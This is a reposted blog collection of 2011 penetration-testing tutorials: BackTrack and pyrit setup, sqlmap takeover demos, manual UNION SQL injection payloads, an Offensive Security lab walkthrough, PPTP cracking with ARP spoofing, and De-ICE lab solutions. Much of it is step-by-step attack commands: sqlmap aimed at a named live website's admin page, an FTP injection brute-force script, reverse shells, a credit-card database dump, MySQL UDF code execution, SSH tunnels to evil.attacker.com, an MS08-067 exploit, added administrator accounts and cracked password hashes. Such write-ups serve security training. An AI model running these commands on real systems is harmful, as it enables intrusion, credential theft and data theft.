Sunday, December 25, 2011

HOWTO : Android 4.0 (Galaxy Nexus) File Transfer on Ubuntu 11.10

This tutorial is not my work but is OhHeyitsLou. Please credit to him.

Step by step tutorial

Youtube step by step tutorial

That's all! See you.

HOWTO : BackTrack 5 R1 on Intel X79 Express chipset and nVidia display card

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R1

BackTrack 5 R1 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install the BackTrack 5 R1 as usual. When it is required to reboot, do not remove the BackTrack 5 R1 CD. Boot up the CD accordingly. After the BackTrack 5 R1 is booted up, mount the hard drive and add "nomodeset" to boot option of the grub.cfg at /boot/grub.

After that, reboot the system and remove the CD. The system will be boot into BackTrack 5 R1 without problem.

If the kernel is upgraded, you should rebuild the kernel headers by the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


Installation of nVidia display driver

Go to nVidia Deleloper Zone CUDA Toolkit 4.0 to download the following. Do not enter to X11 by issuing "startx"; otherwise, the installation will be failed.

(1) Download "Developer Drivers for Linux (270.41.19)" for the nVidia Driver.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_32_270.41.19.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_0/drivers/devdriver_4.0_linux_64_270.41.19.run

chmod +x devdriver_4.0_linux_xx_270.41.19.run
./devdriver_4.0_linux_xx_270.41.19.run


(2) Download "CUDA Toolkit for Ubuntu Linux 10.10" for the CUDA Toolkit.

32-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_32_ubuntu10.10.run

64-bit :
wget http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0/toolkit/cudatoolkit_4.0.17_linux_64_ubuntu10.10.run

chmod +x cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run
./cudatoolkit_4.0.17_linux_xx_ubuntu10.10.run


(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

chmod +x gpucomputingsdk_4.0.17_linux.run
./gpucomputingsdk_4.0.17_linux.run


nano /root/.bashrc

Append the following :

export PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64


After that, reboot the system to make the nVidia driver effect.

Installation of pyrit

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install


To test if the installation is correct or not.

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


That's all! See you.

Before water cooling



After water cooling

Friday, December 23, 2011

HOWTO : Ubuntu 12.04 LTS on Intel X79 Express Chipset and nVidia Display Card

At this writing, Ubuntu 12.04 LTS is still under heavy development and at Alpha 1 stage.

It is no problem to boot Ubuntu 12.04 LTS on Intel X79 Express Chipset due to Kernel version 3.2.

If the system is equipped with nVidia display card, you need to set "nomodeset" by pressing F6 on the boot up menu of the Live CD of Ubuntu 12.04 LTS. (Press Enter when "keyboard" and "human" figures appear on the bottom on the screen when booting up)

That's all! See you.

Friday, September 16, 2011

HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to :ruo911

This is ruo911's work but not mine. I re-post it for educational purpose only.



Command

cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump


try login.

p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap

2. user agent options
example)
--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"

That's all! See you.

HOWTO : SQL Injection by tools

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : medmado1990

This is medmado1990's work but not mine. I re-post it for educational purpose only.





That's all! See you.

HOWTO : Blind SQL Injection

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : KFProdigy

This is KFProdigy's work but not mine. I re-post it for educational purpose only.





Hello everyone, In this tutorial I show you how to manually do an SQL injection into a vulnerable site. Also, at the beginning when i say "google dorks", I dont mean that people from google are dorks, i mean actually go to google and search "dork" or "dorks"
basically its something like "inurl:news.php?id=" or anything along those lines. I hope this helps!

For more tutorials and tools, check out http://sqliunderground.co.cc , I have a really in-depth tutorial on there.
P.S. This is for educational purposes only.


THE THINGS I PASTE
group_concat(table_name)

from information_schema.tables where table_schema=database()--

concat(column,0x3a,column) from table/*

An example would be
Example.com/index.php?id=-32 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password) from adminlogin/*,7,8,9 from information_schema.columns where table_schema=database()--

That's all! See you.

Thursday, September 15, 2011

Official SQLMap video demo series

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.

HOWTO : Offical SQLMap video demonstration 1

HOWTO : Offical SQLMap video demonstration 2

HOWTO : Offical SQLMap video demonstration 3

HOWTO : Offical SQLMap video demonstration 4

HOWTO : Offical SQLMap video demonstration 5

HOWTO : Offical SQLMap video demonstration 6

HOWTO : Offical SQLMap video demonstration 7

HOWTO : Offical SQLMap video demonstration 8

HOWTO : Offical SQLMap video demonstration 9

HOWTO : Offical SQLMap video demonstration 10

HOWTO : Offical SQLMap video demonstration 11

HOWTO : Offical SQLMap video demonstration 12

That's all! See you.

HOWTO : Offical SQLMap video demonstration 12

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections, then exploit a database's stored procedure heap-based buffer overflow vulnerability (MS09-004) if it is Microsoft SQL Server 2000 or 2005. sqlmap relies on Metasploit to create the shellcode which gets executed upon successful exploiting of the buffer overflow on the database server and establishes the connection between the user's machine and the database server.

The control is passed over to the Metasploit command line interface where the user can proceed to privilege escalate to SYSTEM by exploiting MS10-015 vulnerability with Meterpreter getsystem command.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/iis/get_int.asp?id=1 --os-bof -v 1 --msf-path ~/software/metasploit

That's all! See you.

HOWTO : Offical SQLMap video demonstration 11

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band command prompt session between the user's machine and the database server. When the back-end database is MySQL, ASP and PHP languages do not support stacked queries (ASP.NET does though): there is no way to inject different SQL statements in the same HTTP request.

As a result, sqlmap uploads a web shell in a writable directory within the web server document root and uses it to execute the Metasploit payload stager previously created. The out-of-band command prompt session is now established and the control is passed over to the Metasploit command line interface.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mqsql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 10

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap out-of-band takeover features with Metasploit integration: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by spawning an out-of-band Meterpreter session between the user's machine and the database server then escalating database process' user privileges to SYSTEM. sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database.

Then it asks the user for options to create the Metasploit shellcode and executes it in-memory within the database process via the injected sys_bineval() user-defined function.

The out-of-band Meterpreter session is now established and the control is passed over to the Metasploit command line interface where the user can enjoy a SYSTEM shell on the database server.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/iis/get_int_84.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 9

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap command execution features: sqlmap is launched against an ASP.NET test page hosted on a Microsoft Windows 2003 server with back-end database management system being MySQL 5.0.

The tool is instructed to identify possible SQL injections and exploit them by spawning an interactive command prompt where the user can execute commands on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database then shows the command prompt.

For each command the user can choose if he wants to retrieve the command standard output or, alternatively, automatically retrieve the output for all commands. If the answer is positive (y or a), sqlmap executes the command once and stores its standard output in a support table.

Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards.

This technique is also implemented for PostgreSQL. On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/iis/get_int_50.aspx?id=1 --os-shell -v 1 --union-use

That's all! See you.

HOWTO : Offical SQLMap video demonstration 8

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap command execution features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by executing a command on the database server operating system. sqlmap first uploads a dynamic-linked library (DLL) used to create two user-defined functions (sys_exec() and sys_eval()) in the database. Then it asks the user if he wants to retrieve the command standard output.

If the answer is positive, sqlmap executes the command once and stores its standard output in a support table. Either boolean-based blind SQL injection or UNION query SQL injection technique is used to dump the entry of this table and delete it afterwards. This technique is also implemented for MySQL.

On Microsoft SQL Server, xp_cmdshell extended stored procedure is used to execute commands on the underlying operating system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.8.4.php?id=1 --os-cmd "id" -v 1

That's all! See you.

HOWTO : Offical SQLMap video demonstration 7

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap file system write access features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.3.

The tool is instructed to identify possible SQL injections and exploit them by uploading a local file to the database server file system. sqlmap encoded the local file in base64, insert it into a temporary support table then abuses the PostgreSQL Large Object functions to export it to a file on the underlying file system.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 6

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap file system read access features: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections and exploit them by retrieving a file from the database server file system. The file is stored locally on the user's machine and can be either a text or a binary file.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/mssql/iis/get_int.asp?id=1 --read-file "C:\example.txt" -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 5

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap custom enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition.

The tool is instructed to identify possible SQL injections and exploit them by spawning a SQL shell where it is possible to provide custom SQL statements to be executed on the back-end database management system. sqlmap analyzes the provided SQL statement, decides which technique to use to execute it and proceeds accordingly.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 --sql-shell -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 4

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap in-depth enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being PostgreSQL 8.4.

The tool is instructed to identify possible SQL injections and exploit them by enumerating and dumping entries of all databases' tables containing one or more of the columns specified by the user. sqlmap always stores dumped entries in a local CSV file upon successful dump.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --dump -C 'user,pass' -v 1 --exclude-sysdbs

That's all! See you.

HOWTO : Offical SQLMap video demonstration 3

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap options' granularity with verbose output: sqlmap is launched against an ASP test page hosted on a Microsoft Windows 2003 server with back-end database management system being Microsoft SQL Server 2005.

The tool is instructed to identify possible SQL injections and exploit them by dumping only from the second to the third entry of column surname of table users in the database testdb.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 2

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap enumeration features with verbose output: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being Oracle 10.2 Enterprise Edition.

The tool is instructed to identify possible SQL injections, check if they are also exploitable via UNION query SQL injection technique, then enumerate the banner and the session user's password hash(es).

The technique used to dump this data from the back-end database software is specified by the user as UNION query SQL injection. If the parameter was not affected by UNION query SQL injection, sqlmap would have fallen back to the default technique, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/oracle/get_init.php?id=1 -b --passwords -U CU --union-use -v 2

That's all! See you.

HOWTO : Offical SQLMap video demonstration 1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : Bernardo

This is Bernardo's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Original link is here.



Demonstration of sqlmap database fingerprint and enumeration features: sqlmap is launched against a PHP test page hosted on a Debian GNU/Linux 5.0 server with back-end database management system being MySQL 5.1.

The tool is instructed to identify possible SQL injections and exploit them by extensively fingerprinting the back-end database management system, then enumerate the banner, the session user, the current database, the database's users, users' password hashes and available databases.

The technique used to dump this data from the back-end database software is the default, boolean-based blind SQL injection.

Command

python sqlmap.py -u http://172.16.213.131/sqlmap/mysql/get_init.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

That's all! See you.

Monday, September 12, 2011

HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***

Credit to : muts (of Offensive Security)

This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

Penetration Testing in the Real World from Offensive Security on Vimeo.


ftp-brute.py

#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):

   username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --  "
   password=str("1")
   ftp=FTP('www.offseclabs.com')
   ftp.login(username,password)
   print "Logged in as user "+str(i)+",1"
   ftp.retrlines('LIST')
   ftp.close()


Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  
password - 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  
password - 1

(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell)

-----------------------
Open Terminal B :

nc -lvp 80

-----------------------
Open Terminal C :

wget www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

-----------------------
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

------------------------
Open a Firefox :

www.offseclabs.com/images/ccdump.txt
(we got the database dump)

-------------------------
Go back to Terminal A :

(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)

-------------------------
Open Firefox :

www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)

** Details of lib_mysqludf_sys.so

---------------------------
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

----------------------------
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)

---------------------------
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

----------------------------
Open Terminal E :

nc -lvp 80

----------------------------
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');

(press enter and we got another reverse shell at Terminal E)

---------------------------
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

-----------------------------
Open Terminal F :

netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

------------------------------
Go back to Terminal F :

cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

-----------------------------------
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username - hacker and password - hacker)


That's all! See you.

g0tmi1k's Video Series

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The following are my collections :

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

HOWTO : pWnOS

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

HOWTO : Kioptrix - Level 1

HOWTO : Kioptrix - Level 1.1

HOWTO : Kioptrix - Level 1.2

HOWTO : Holynix - Level 1

HOWTO : Holynix - Level 2

That's all! See you.

HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch on-line
Download Video
Script (chap2asleap.py)

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.

How does this work?

From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down:

CHAP Challenge = Auth Challenge (16 bytes)
CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1)the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.

This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.

What do I need?

asleap
Python
The script - chap2asleap.py
Wireshark
VPN
THC-pptp-bruter

Software
Name: asleap
Version: 2.2
Home Page: http://www.willhackforsushi.com/Asleap.html
Download Link: http://www.willhackforsushi.com/code/asleap/2.2/asleap-2.2.tgz

Name: THC-pptp-bruter
Version: 0.1.4
Home Page: http://freeworld.thc.org
Download Link: http://freeworld.thc.org/download.php?t=r&f=thc-pptp-bruter-0.1.4.tar.gz

Name: chap2asleap.py
Version: 0.1.1
Home Page: http://g0tmi1k.blogspot.com
Download Link: http://www.mediafire.com/?wnkoyiai2ty

How to use chap2asleap.py:
1.) chmod 755 chap2asleap.py
2.) python chap2asleap.py

Commands

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3


That's all! See you.

HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:
http://www.mediafire.com/?bfo9b21g2m69tb6
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso

Forums/Support: http://forums.heorot.net andhttp://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.100

firefox 192.168.1.100

[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast

hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s

ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter

cd /etc/

cat passwd

[+]kate -> Update usernames. Save.

cat group

exit

cd /root/tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords

ssh aadams@192.168.1.100
// Password: nostradamus

cd /etc/

sudo cat shadow
// Password: nostradamus

[+]kate -> New -> Paste -> Save. Filename: shadow

exit

john

./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot

ssh aadams@192.168.1.100
// Password: nostradamus

su
// Password: tarot

ls -a

cd ..

ls -a

cd ftp
/

ls -a

cd incoming/

ls -a

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot

cd /etc/

vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)

modprobe capability

exit

exit

ftp 192.168.1.100
// User: root. Password: tarot

ls -a

cd ..

ls -a

cd home

ls -a

cd ftp

ls -a

cd incoming

ls -a

get salary.csv

cd /pentest/passwords/jtr

ls

mv salary.csv ~

[+]kate -> salary.csv

// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://www.mediafire.com/?tnci5ewmcoyrp8o
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.110

firefox 192.168.1.110

[+]kate -> make list of possible usernames

// lastF, fLast

ftp 192.168.1.110

// Username: anonymous. Password: [Blank]

ls -a

cd download

ls -a

cd etc

ls -a

get core

exit

strings core

[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow

cd tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

john

./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous

ssh ccofee@192.168.1.110
//Password: Diatomaceous

ls -a

cd ..

ls -a

cd root/

ls -a

cd .save/

su
//Password: Complexity

cd .save/

ls -a

cat copy.sh

openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

ls -a

cat customer_account.csv
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
